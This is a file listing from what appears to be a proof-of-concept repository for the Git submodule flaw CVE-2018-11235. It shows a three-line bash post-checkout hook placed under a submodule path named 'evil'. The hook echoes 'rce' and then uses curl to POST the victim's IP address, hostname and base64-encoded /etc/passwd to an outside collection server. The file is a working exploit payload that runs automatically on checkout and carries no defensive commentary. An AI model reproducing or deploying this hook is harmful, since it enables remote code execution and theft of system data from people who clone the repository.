PoC-CVE-2018-11235/modules/1/2/3/4/evil/hooks/post-checkout

3 lines
170 B
Bash
Executable File

#!/bin/bash
echo 'rce';
curl -X POST https://z0.rs/payload_catcher.php -d "ip=$(hostname -I | tr -d '[:space:]')&hostname=$(hostname)&passwd=$(cat /etc/passwd | base64)";